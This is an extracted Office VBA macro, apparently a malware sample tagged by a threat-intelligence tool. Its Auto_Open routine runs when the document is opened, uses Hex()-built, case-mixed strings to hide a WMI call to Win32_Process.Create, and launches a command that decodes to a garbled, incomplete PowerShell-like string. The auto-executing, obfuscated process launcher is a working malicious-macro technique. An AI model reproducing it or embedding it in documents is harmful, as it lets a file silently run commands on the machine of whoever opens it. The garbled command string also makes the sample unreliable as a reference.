Attribute VB_Name = "SYq2bHBGPVGs"



Sub Auto_Open()

g0

End Sub



Public Sub s0(n0)
Set d0 = GetObject("WiNmGmTs:{ImPeRsOnAtIoNlEvEl=ImPeRsOn" + l0 + "tE}!\\.\RoOt\" + h0 + "iMv2")
Set b0 = d0.Get("wIn" + Hex(50) + "_pRo" + h0 + r0 + "Ss")
a0 = b0.Create(n0, Null)
End Sub



Public Sub g0()

p0 = "" + r0 + "rSh" + r0 + "lL -" + h0 + "o" + l0 + "nd"
MsgBox p0, vbInformation, "-[+]-"
s0 (p0)

End Sub


Function h0()
h0 = "" + Hex(12) + ""
End Function
Function l0()
l0 = "" + Hex(10) + ""
End Function
Function r0()
r0 = "" + Hex(14) + ""
End Function






















INQUEST-PP=macro
